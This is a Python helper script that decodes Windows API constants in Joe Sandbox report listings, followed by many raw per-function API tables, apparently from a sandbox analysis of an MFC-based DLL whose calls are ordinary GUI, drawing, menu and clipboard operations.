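The API tables in these function entries are easier to triage once their raw hex arguments are turned back into symbolic constants. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the report's listing format (including the indented "Part of subcall function" entries), decodes the GetSystemMetrics index, the SendMessage message ID, the LoadIcon resource ID, the CreateFileW access/disposition/flags words and the GetWindowLong/GetClassLong/SetWindowLong index, and flags any CreateFile that sits in the same subcall chain as a GetTempPath call. Assumptions: the constant tables are deliberately partial (only values that occur in this report); the rule that the report renders negative indices truncated to one byte (000000FC for GWL_WNDPROC = -4, 000000EC for GWL_EXSTYLE = -20, 000000F2 for GCL_HICON = -14) is inferred from the listed values, not documented report behaviour; the sample input is constructed from entries on this page.

```python
"""Parse Joe Sandbox per-function API listings and decode triage-relevant constants.
Added example. Constant tables are partial (values seen in this report only); the
one-byte rendering of negative window/class indices is inferred, not documented."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Union

Arg = Union[int, str, None]          # None stands for the report's '?'

LINE_RE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

SM_INDEX = {4: "SM_CYCAPTION", 5: "SM_CXBORDER", 6: "SM_CYBORDER", 0x20: "SM_CXFRAME",
            0x21: "SM_CYFRAME", 0x31: "SM_CXSMICON", 0x32: "SM_CYSMICON",
            0x48: "SM_CYMENUCHECK", 0x5C: "SM_CXPADDEDBORDER"}
MSG_ID = {0x10: "WM_CLOSE", 0x1F: "WM_CANCELMODE", 0x110: "WM_INITDIALOG", 0x146: "CB_GETCOUNT",
          0x147: "CB_GETCURSEL", 0x150: "CB_GETITEMDATA", 0x170: "STM_SETICON"}
NEG_INDEX = {-4: "GWL_WNDPROC", -14: "GCL_HICON", -20: "GWL_EXSTYLE"}
ICON_ID = {0x7F00: "IDI_APPLICATION"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}
FILE_FLAGS = {0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Arg]
    ref: int
    subcall_of: Optional[int] = None   # set for "Part of subcall function X:" lines
    decoded: List[str] = field(default_factory=list)


def flag_names(value: int, table: Dict[int, str]) -> str:
    """Render a bit mask as OR'ed names; unknown bits are kept as a hex remainder."""
    names = [n for bit, n in table.items() if value & bit]
    rest = value
    for bit in table:
        rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) if names else "0"


def decode(call: ApiCall) -> List[str]:
    base = re.sub(r"[AW]$", "", call.name)       # SendMessageW -> SendMessage
    a, ints = call.args, [isinstance(x, int) for x in call.args]
    if base == "GetSystemMetrics" and len(a) > 0 and ints[0]:
        return [SM_INDEX.get(a[0], f"SM index {a[0]}")]
    if base == "SendMessage" and len(a) > 1 and ints[1]:
        return [MSG_ID.get(a[1], f"msg 0x{a[1]:X}")]
    if base == "LoadIcon" and len(a) > 1 and ints[1]:
        return [ICON_ID.get(a[1], f"icon 0x{a[1]:X}")]
    if base in ("SetWindowLong", "GetWindowLong", "GetClassLong") and len(a) > 1 and ints[1]:
        idx = a[1] - 0x100 if 0x80 <= a[1] < 0x100 else a[1]   # inferred: -4 shown as 000000FC
        return [NEG_INDEX.get(idx, f"index {idx}")]
    if base == "CreateFile" and len(a) >= 6 and all(ints[1:6]):
        return [flag_names(a[1], ACCESS), DISPOSITION.get(a[4], f"disposition {a[4]}"),
                flag_names(a[5], FILE_FLAGS)]
    return []


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok                                    # e.g. the atom name AfxOldWndProc423


def parse_listing(text: str) -> List[ApiCall]:
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                              # headings, hashes, dump metadata
        raw = m.group("args")
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        call = ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16),
                       int(m.group("sub"), 16) if m.group("sub") else None)
        call.decoded = decode(call)
        calls.append(call)
    return calls


def file_drops(calls: List[ApiCall]) -> List[dict]:
    """Decoded CreateFile calls, flagged when their subcall chain resolved %TEMP% first."""
    temp_chains = {c.subcall_of for c in calls if c.name.startswith("GetTempPath")}
    return [{"ref": f"{c.ref:08X}", "access": c.decoded[0], "disposition": c.decoded[1],
             "flags": c.decoded[2], "in_temp_chain": c.subcall_of in temp_chains}
            for c in calls if c.name.startswith("CreateFile") and len(c.decoded) == 3]


# Constructed sample: lines copied from entries in this report.
SAMPLE = """\
APIs
• __EH_prolog3_GS.LIBCMT ref: 6C8E4245
• GetSystemMetrics.USER32(00000004), ref: 6C8E427E
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 6C932784
• LoadIconW.USER32(00000000,00007F00), ref: 6C93282C
• GetClassLongW.USER32(?,000000F2), ref: 6C93285B
  • Part of subcall function 6C8D14CE: GetTempPathW.KERNEL32(00000104,00000000,00000104,?,00000000,00000080,6C932FD1,?,00000000,?,?,00000000), ref: 6C8D1534
  • Part of subcall function 6C8D14CE: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,04000100,00000000,000000FF,?,00000104,000000FF,?,?,00000000), ref: 6C8D1589
• SetWindowLongW.USER32(?,000000FC,?), ref: 6C89108B
• RemovePropW.USER32(?,AfxOldWndProc423), ref: 6C891097
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9329B5
"""

if __name__ == "__main__":
    parsed = parse_listing(SAMPLE)
    for c in parsed:
        where = f"sub {c.subcall_of:08X}: " if c.subcall_of is not None else ""
        print(f"{where}{c.name}.{c.module} @ {c.ref:08X} -> {', '.join(c.decoded) or '-'}")
    for drop in file_drops(parsed):
        print(drop)
```

On the sample, the CreateFileW inside subcall 6C8D14CE decodes to GENERIC_READ|GENERIC_WRITE, CREATE_ALWAYS, FILE_ATTRIBUTE_TEMPORARY|FILE_FLAG_DELETE_ON_CLOSE, and the same subcall called GetTempPathW first: a temporary file that the kernel deletes when its last handle closes, which is worth knowing before treating the entry as a persistent drop. The decoded SetWindowLongW index GWL_WNDPROC, next to RemovePropW of the AfxOldWndProc423 property, is the normal MFC window-unsubclassing sequence rather than foreign code injection.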
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C904B5E
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 6C904B83
                                                                  • GetObjectW.GDI32(?,00000054,?), ref: 6C904BC8
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C904CB4
                                                                  • SelectObject.GDI32(?,?), ref: 6C904CD6
                                                                  • GetPixel.GDI32(?,00000000,00000000), ref: 6C904D35
                                                                  • GetPixel.GDI32(?,?,00000000), ref: 6C904D47
                                                                  • SetPixel.GDI32(?,00000000,00000000,00000000), ref: 6C904D56
                                                                  • SetPixel.GDI32(?,?,00000000,00000000), ref: 6C904D68
                                                                  • SelectObject.GDI32(?,00000000), ref: 6C904DB6
                                                                  Similarity
                                                                  • API ID: ObjectPixel$Select$CompatibleCreateH_prolog3_
                                                                  • String ID:
                                                                  • API String ID: 1266819874-0
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8BC958
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8BC965
                                                                  • KillTimer.USER32(?,0000EC17), ref: 6C8BC97D
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BC9AC
                                                                  • KillTimer.USER32(?,0000EC18), ref: 6C8BCA3B
                                                                  • GetParent.USER32(?), ref: 6C8BCA50
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BCA7C
                                                                  • KillTimer.USER32(?,0000EC07), ref: 6C8BCADB
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BCAEF
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BCAFF
                                                                    • Part of subcall function 6C89BE35: ShowWindow.USER32(?,00000000,?,?,6C89961A,00000000), ref: 6C89BE46
                                                                  Similarity
                                                                  • API ID: Rect$KillTimer$Client$CursorParentScreenShowWindow
                                                                  • String ID:
                                                                  • API String ID: 966434589-0
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,00000046,00000000,?,?), ref: 6C8A4CFF
                                                                  • GetWindowRect.USER32(?,?), ref: 6C8A4D1E
                                                                  • SetRect.USER32(?,?,00000000,?,?), ref: 6C8A4D5D
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8A4D6C
                                                                  • SetRect.USER32(?,?,00000000,?,?), ref: 6C8A4D84
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8A4D93
                                                                  • SetRect.USER32(?,00000000,?,?,?), ref: 6C8A4DBB
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8A4DCA
                                                                  • SetRect.USER32(?,00000000,?,00000001,?), ref: 6C8A4DE1
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8A4DF0
                                                                  Similarity
                                                                  • API ID: Rect$Invalidate$Window$Proc
                                                                  • String ID:
                                                                  • API String ID: 570070710-0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8A2643
                                                                  • ClientToScreen.USER32(?,?), ref: 6C8A2662
                                                                  • GetSystemMetrics.USER32(00000025), ref: 6C8A266A
                                                                  • GetSystemMetrics.USER32(00000025), ref: 6C8A2680
                                                                  • GetSystemMetrics.USER32(00000024), ref: 6C8A2694
                                                                  • GetSystemMetrics.USER32(00000024), ref: 6C8A26A8
                                                                  • CreateEllipticRgn.GDI32(00000000,00000000,00000020,00000020,?,00007921,?,?,?,?,00000010), ref: 6C8A2721
                                                                  • SetWindowRgn.USER32(?,?,00000001), ref: 6C8A2738
                                                                  • SetCapture.USER32(?,?,00007921,?,?,?,?,00000010), ref: 6C8A2741
                                                                  • SetTimer.USER32(?,0000EC08,00000032,00000000), ref: 6C8A275A
                                                                  Similarity
                                                                  • API ID: MetricsSystem$CaptureClientCreateEllipticH_prolog3ScreenTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3001615190-0
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6C88A92A
                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C88A93A
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C88A943
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C88A951
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 6C88A979
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeDirectoryEncodeHandleModuleProcSystem
                                                                  • String ID: SetDefaultDllDirectories$\$kernel32.dll
                                                                  • API String ID: 2101061299-3881611067
                                                                  APIs
                                                                  • GetStockObject.GDI32(00000011), ref: 6C8ACC76
                                                                  • GetStockObject.GDI32(0000000D), ref: 6C8ACC82
                                                                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 6C8ACC93
                                                                  • GetDC.USER32(00000000), ref: 6C8ACCA2
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6C8ACCB9
                                                                  • MulDiv.KERNEL32(?,00000048,00000000), ref: 6C8ACCC5
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 6C8ACCD1
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Object$Stock$CapsDeviceRelease
                                                                  • String ID: System
                                                                  • API String ID: 46613423-3470857405
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$ActiveFocus$MessageSend
                                                                  • String ID: u
                                                                  • API String ID: 1556911595-4067256894
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C99C690
                                                                    • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(6CA583D0,?,?,0000007C,?,6C88F718,00000001), ref: 6C8A3391
                                                                    • Part of subcall function 6C8A3360: InitializeCriticalSection.KERNEL32(00000000,?,6C88F718,00000001), ref: 6C8A33A7
                                                                    • Part of subcall function 6C8A3360: LeaveCriticalSection.KERNEL32(6CA583D0,?,6C88F718,00000001), ref: 6C8A33B5
                                                                    • Part of subcall function 6C8A3360: EnterCriticalSection.KERNEL32(00000000,?,0000007C,?,6C88F718,00000001), ref: 6C8A33C2
                                                                  • GetProfileIntW.KERNEL32(windows,DragScrollInset,0000000B), ref: 6C99C6DB
                                                                  • GetProfileIntW.KERNEL32(windows,DragScrollDelay,00000032), ref: 6C99C6EE
                                                                  • GetProfileIntW.KERNEL32(windows,DragScrollInterval,00000032), ref: 6C99C701
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CriticalSection$Profile$Enter$H_prolog3InitializeLeave
                                                                  • String ID: DragScrollDelay$DragScrollInset$DragScrollInterval$windows
                                                                  • API String ID: 4229786687-1024936294
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8CE53B
                                                                  • FillRect.USER32(?,?,-000000D0), ref: 6C8CE568
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8CE67C
                                                                  • CreatePolygonRgn.GDI32(?,00000008,00000002), ref: 6C8CE8D3
                                                                  • FillRect.USER32(00000002,?,?), ref: 6C8CE957
                                                                  • FillRect.USER32(00000002,?,-000000D0), ref: 6C8CE99A
                                                                  • Polyline.GDI32(00000002,?,00000008), ref: 6C8CE9B2
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8CEA05
                                                                  • FillRect.USER32(00000000,?,-000000D0), ref: 6C8CEA3A
                                                                  Similarity
                                                                  • API ID: FillRect$H_prolog3_$CreateH_prolog3PolygonPolyline
                                                                  • String ID:
                                                                  • API String ID: 835743752-0
                                                                  • Opcode ID: 1f02afe251b348e54f2a397ce01edc105c68e8a4b462f41aa4bca9bb77c22039
                                                                  • Instruction ID: d6207d97fb9f8bb12dfb3cf33441d71fd58e707531ce095a7535f20301f9bb19
                                                                  • Opcode Fuzzy Hash: 1f02afe251b348e54f2a397ce01edc105c68e8a4b462f41aa4bca9bb77c22039
                                                                  • Instruction Fuzzy Hash: 21029E71A012199FDF24CFA8CA85BEEB7B5BF08304F104569E815ABB90DB70AD49CF51
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C89A1AF
                                                                    • Part of subcall function 6C8C5DC9: LoadCursorW.USER32(?,00007F00), ref: 6C8C5E2B
                                                                  • GetSystemMenu.USER32(?,00000000,00000000,00000000,6CA37FF0,?,6CA509BC), ref: 6C89A220
                                                                  • DeleteMenu.USER32(?,0000F000,00000000,00000000), ref: 6C89A243
                                                                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 6C89A253
                                                                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 6C89A263
                                                                  • DeleteMenu.USER32(?,0000F120,00000000), ref: 6C89A273
                                                                  • DeleteMenu.USER32(00000000,0000F060,00000000,0000F011), ref: 6C89A2A6
                                                                  • AppendMenuW.USER32(00000000,00000000,0000F060,?), ref: 6C89A2BA
                                                                  • SetParent.USER32(?,?), ref: 6C89A307
                                                                  Similarity
                                                                  • API ID: Menu$Delete$AppendCursorH_prolog3LoadParentSystem
                                                                  • String ID:
                                                                  • API String ID: 2353656248-0
                                                                  • Opcode ID: abb4bf24f74c55279b95d737ab86a59954664a47c2d5ab77156f06cb483f54d8
                                                                  • Instruction ID: a235ae1f0f0a818b59f45acbb838125eb6bbb85d066688e5cf58699917f67424
                                                                  • Opcode Fuzzy Hash: abb4bf24f74c55279b95d737ab86a59954664a47c2d5ab77156f06cb483f54d8
                                                                  • Instruction Fuzzy Hash: C341B331B4071AAFEB349FA4CD59FAE7AB4FF04B48F004924B655A79D0DB70A900DB94
                                                                  APIs
                                                                  • GetPropW.USER32(?,?), ref: 6C8AC0A2
                                                                  • GlobalLock.KERNEL32(00000000), ref: 6C8AC0AF
                                                                  • SendMessageW.USER32(?,00000476,00000000,00000000), ref: 6C8AC0CA
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6C8AC0D5
                                                                  • RemovePropW.USER32(?), ref: 6C8AC0E4
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6C8AC0EF
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6C8AC111
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 6C8AC122
                                                                  • SendMessageW.USER32(?,00000475,00000000,?), ref: 6C8AC14A
                                                                  Similarity
                                                                  • API ID: Global$MessagePropSendUnlock$AsyncFreeLockRemoveState
                                                                  • String ID:
                                                                  • API String ID: 723318029-0
                                                                  • Opcode ID: 951e0425251b961c64387ea6e7392c4a79cca8f6606aeb4894aad273b348090d
                                                                  • Instruction ID: 135ea5eb93b8cfc2025c696d330de17eb4955a0ca49d8a02e573f77364b857f9
                                                                  • Opcode Fuzzy Hash: 951e0425251b961c64387ea6e7392c4a79cca8f6606aeb4894aad273b348090d
                                                                  • Instruction Fuzzy Hash: 5521C231301316ABDF393FB2CD19B163679BF0638DF108929F506D2A52DB72D812CA90
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,?), ref: 6C8AC5C5
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 6C8AC5D4
                                                                  • IsWindowEnabled.USER32(00000000), ref: 6C8AC5E2
                                                                  • GetDlgItem.USER32(?,00003024), ref: 6C8AC5F9
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 6C8AC605
                                                                  • IsWindowEnabled.USER32(?), ref: 6C8AC615
                                                                  • GetFocus.USER32 ref: 6C8AC636
                                                                  • IsWindowEnabled.USER32(00000000), ref: 6C8AC63D
                                                                  • SetFocus.USER32(?), ref: 6C8AC64A
                                                                  Similarity
                                                                  • API ID: Window$Enabled$FocusItemLong
                                                                  • String ID:
                                                                  • API String ID: 1558694495-0
                                                                  • Opcode ID: cbde522686041d0381dfcfb5a1e1d57935eb0070db90f1b06922c9605b8955c1
                                                                  • Instruction ID: 132f01240db93e2c1774b2edba264a2479fb9492f38864a9a03d28e6c3056ad7
                                                                  • Opcode Fuzzy Hash: cbde522686041d0381dfcfb5a1e1d57935eb0070db90f1b06922c9605b8955c1
                                                                  • Instruction Fuzzy Hash: 2F11F632700236ABDB297FA8CD48B5E7B78FF46359B144618F915D2161EB32DC12DB80
                                                                  APIs
                                                                  • __EH_prolog3_catch.LIBCMT ref: 6C8B0941
                                                                    • Part of subcall function 6C8FE220: __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                  • IsWindow.USER32(?), ref: 6C8B0A74
                                                                    • Part of subcall function 6C89BB93: GetDlgCtrlID.USER32(?), ref: 6C89BB9E
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CtrlH_prolog3H_prolog3_catchWindow
                                                                  • String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$Buttons$MFCToolBars$Name
                                                                  • API String ID: 1537839037-190999575
                                                                  • Opcode ID: c435f3bb0c47aeffb5fc7cb8861a163123500a56fd9a950e2ad0042034c4db9d
                                                                  • Instruction ID: 98d0e2d2f634933b495d7b9db2ce97cf3cad1113f367d88523111d7db349ae18
                                                                  • Opcode Fuzzy Hash: c435f3bb0c47aeffb5fc7cb8861a163123500a56fd9a950e2ad0042034c4db9d
                                                                  • Instruction Fuzzy Hash: AE71A270A0021DDFCF15DFA8CA50AEDBBB5AF49318F104469E815B7790DB309E05CB61
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000004C), ref: 6C8C6B69
                                                                  • GetSystemMetrics.USER32(0000004D), ref: 6C8C6B74
                                                                  • GetSystemMetrics.USER32(0000004E), ref: 6C8C6B7F
                                                                  • GetSystemMetrics.USER32(0000004F), ref: 6C8C6B8D
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C8C6BE6
                                                                  • IntersectRect.USER32(?,?,?), ref: 6C8C6C41
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MetricsSystem$IntersectRect
                                                                  • String ID: "
                                                                  • API String ID: 1124862357-123907689
                                                                  • Opcode ID: 0512e2b71d6c667fe3526de7a06f124d6a637dde1b45d4272d3f837f3c1303de
                                                                  • Instruction ID: 275f56d03fdd9eb949932ac50af3960d041b685e1436f293a33f31ee8e050a20
                                                                  • Opcode Fuzzy Hash: 0512e2b71d6c667fe3526de7a06f124d6a637dde1b45d4272d3f837f3c1303de
                                                                  • Instruction Fuzzy Hash: A161A572A01209DFCF54DFA8D9C4A9DBBF4FF09314B11856AE905EB205EB31E980CB54
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8D22A6
                                                                    • Part of subcall function 6C8D222C: GetObjectW.GDI32(?,00000018,?), ref: 6C8D2249
                                                                  • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 6C8D2342
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C8D236B
                                                                  • SelectObject.GDI32(?,?), ref: 6C8D2380
                                                                  • SelectObject.GDI32(?,?), ref: 6C8D2416
                                                                  • DeleteObject.GDI32(?), ref: 6C8D242E
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Object$CreateSelect$CompatibleDeleteH_prolog3_Section
                                                                  • String ID: (
                                                                  • API String ID: 2192781631-3887548279
                                                                  • Opcode ID: d097a18ab297646c8c93b14a47799effdfbe3cb06c3644d78cc86602b27f79f9
                                                                  • Instruction ID: 6859cfe615d4d734c98b7b73f9609364dd75507447f9e5038f7a360555aa1d55
                                                                  • Opcode Fuzzy Hash: d097a18ab297646c8c93b14a47799effdfbe3cb06c3644d78cc86602b27f79f9
                                                                  • Instruction Fuzzy Hash: 68514B75E00618DFCB29DFA8C954AADBBB1FF48304F14812DE416A7390DB34A906CF40
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(uxtheme.dll,?,?,6C89F1C3,?,00000000,?,?,?,000000FF,?,?,00000040), ref: 6C8A64D8
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeTextEx), ref: 6C8A64E8
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C89F1C3,?,00000000,?,?,?,000000FF,?,?,00000040), ref: 6C8A64F1
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C89F1C3,?,00000000,?,?,?,000000FF,?,?,00000040), ref: 6C8A64FF
                                                                  • DrawThemeText.UXTHEME(?,?,?,?,?,?,?,00000000,?,?,?,6C89F1C3,?,00000000,?,?), ref: 6C8A654C
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeDrawEncodeHandleModuleProcTextTheme
                                                                  • String ID: DrawThemeTextEx$uxtheme.dll
                                                                  • API String ID: 1727381832-3035683158
                                                                  • Opcode ID: 850b69f689cd33c36a812307c7e0509486a60d915dc404e13261d3cb54d9b1fb
                                                                  • Instruction ID: 6e0775e5e6273a16325ee5171e117ce3f8938ffd2615568a81aba2520a782b13
                                                                  • Opcode Fuzzy Hash: 850b69f689cd33c36a812307c7e0509486a60d915dc404e13261d3cb54d9b1fb
                                                                  • Instruction Fuzzy Hash: 0F11F33224122AFFCF265FA4CD189DA3F76FF09B55B448510FE19A2524C736C962EB90
                                                                  APIs
                                                                  • GetParent.USER32(000000FF), ref: 6C8BC3E1
                                                                  • SendMessageW.USER32(000000FF,00000362,0000E001,00000000), ref: 6C8BC41D
                                                                    • Part of subcall function 6C8BC6D2: GetParent.USER32(000000FF), ref: 6C8BC6E2
                                                                  • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C8BC43C
                                                                  • GetParent.USER32(000000FF), ref: 6C8BC4F5
                                                                  • PostMessageW.USER32(?,?,?,00000000), ref: 6C8BC5A9
                                                                  • GetParent.USER32(000000FF), ref: 6C8BC613
                                                                  • InvalidateRect.USER32(000000FF,000000FF,00000001,000000FF,?,?), ref: 6C8BC68C
                                                                  • UpdateWindow.USER32(000000FF), ref: 6C8BC698
                                                                  Similarity
                                                                  • API ID: Parent$Message$Send$InvalidatePostRectUpdateWindow
                                                                  • String ID:
                                                                  • API String ID: 4048132615-0
                                                                  • Opcode ID: 0e8a3b8e96bcee265c554ba69a3661e27f372f3e0dd1bbb4be942e5620424c1d
                                                                  • Instruction ID: 1ea74be5c05f383e556da2d6e72e5c25a0d14322071a975be153b602d86aa202
                                                                  • Opcode Fuzzy Hash: 0e8a3b8e96bcee265c554ba69a3661e27f372f3e0dd1bbb4be942e5620424c1d
                                                                  • Instruction Fuzzy Hash: 19919331B0121A9FDB24AF68CE54ABE7BB9BF49308B104969E405F7B91DF709D018B90
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
                                                                  APIs
                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 6C904074
                                                                    • Part of subcall function 6C883E38: __EH_prolog3.LIBCMT ref: 6C883E3F
                                                                    • Part of subcall function 6C883E38: GetWindowDC.USER32(00000000,00000004,6C89E3DA,00000000), ref: 6C883E6B
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 6C90409A
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C9040C0
                                                                    • Part of subcall function 6C883C26: SelectObject.GDI32(6C88F6CB,?), ref: 6C883C2F
                                                                  • FillRect.USER32(?,?,00000000), ref: 6C904112
                                                                  • OpenClipboard.USER32(?), ref: 6C90416C
                                                                  • EmptyClipboard.USER32 ref: 6C9041AC
                                                                  • SetClipboardData.USER32(00000002,00000000), ref: 6C9041D0
                                                                  • CloseClipboard.USER32 ref: 6C9041EA
                                                                  Similarity
                                                                  • API ID: Clipboard$CompatibleCreate$BitmapCloseDataEmptyFillH_prolog3H_prolog3_catch_ObjectOpenRectSelectWindow
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8D032F
                                                                  • GetSysColor.USER32(00000017), ref: 6C8D034C
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 6C8D036F
                                                                  • DrawThemeBackground.UXTHEME(?,?,00000001,00000000,?,00000000), ref: 6C8D0392
                                                                  • GetThemeColor.UXTHEME(?,00000001,00000000,00000EDB,?), ref: 6C8D03A7
                                                                  • GetThemeColor.UXTHEME(?,00000001,00000000,00000EDC,?), ref: 6C8D03BC
                                                                  • GetSysColorBrush.USER32(00000018), ref: 6C8D03C6
                                                                  • FillRect.USER32(00000000,?,00000000), ref: 6C8D03D9
                                                                  Similarity
                                                                  • API ID: Color$Theme$Rect$BackgroundBrushDrawFillH_prolog3_Inflate
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,00000000,00000000,?,?,6C906476,00000000,00000000,?,6CA07E7C,?,6C904753,?,?,?), ref: 6C906492
                                                                  • GlobalLock.KERNEL32(00000000), ref: 6C90649F
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6C9064AA
                                                                  • GlobalFree.KERNEL32(00000000), ref: 6C9064B1
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6C9064CF
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000), ref: 6C9064DC
                                                                  • EnterCriticalSection.KERNEL32(6CA59B30,00000000), ref: 6C9064F5
                                                                  • LeaveCriticalSection.KERNEL32(6CA59B30,00000000), ref: 6C90655C
                                                                  Similarity
                                                                  • API ID: Global$CriticalSectionUnlock$AllocCreateEnterFreeLeaveLockStream
                                                                  APIs
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8BA82E
                                                                  • GetParent.USER32(?), ref: 6C8BA83E
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BA882
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BA894
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BA8A4
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BA8D1
                                                                  • MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BA8E3
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BA8F3
                                                                  Similarity
                                                                  • API ID: Rect$Client$PointsWindow$ParentScreen
                                                                  APIs
                                                                  • GetMenuItemCount.USER32(?), ref: 6C897CBD
                                                                  • GetMenuItemCount.USER32(?), ref: 6C897CC9
                                                                  • GetSubMenu.USER32(?,-00000001), ref: 6C897CE0
                                                                  • GetMenuItemCount.USER32(00000000), ref: 6C897CF3
                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 6C897D04
                                                                  • RemoveMenu.USER32(00000000,00000000,00000400), ref: 6C897D1E
                                                                  • GetSubMenu.USER32(?,00000000), ref: 6C897D35
                                                                  • RemoveMenu.USER32(?,-00000001,00000400), ref: 6C897D50
                                                                  Similarity
                                                                  • API ID: Menu$CountItem$Remove
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(00000031), ref: 6C89ECBF
                                                                  • GetSystemMetrics.USER32(00000032), ref: 6C89ECCD
                                                                  • SetRectEmpty.USER32(?), ref: 6C89ECE0
                                                                  • EnumDisplayMonitors.USER32(00000000,00000000,6C89F489,?,?,?), ref: 6C89ECF0
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C89ECFF
                                                                  • SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 6C89ED2C
                                                                  • SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 6C89ED40
                                                                  • SystemParametersInfoW.USER32(0000100A,00000000,?,00000000), ref: 6C89ED66
                                                                  Similarity
                                                                  • API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
                                                                  APIs
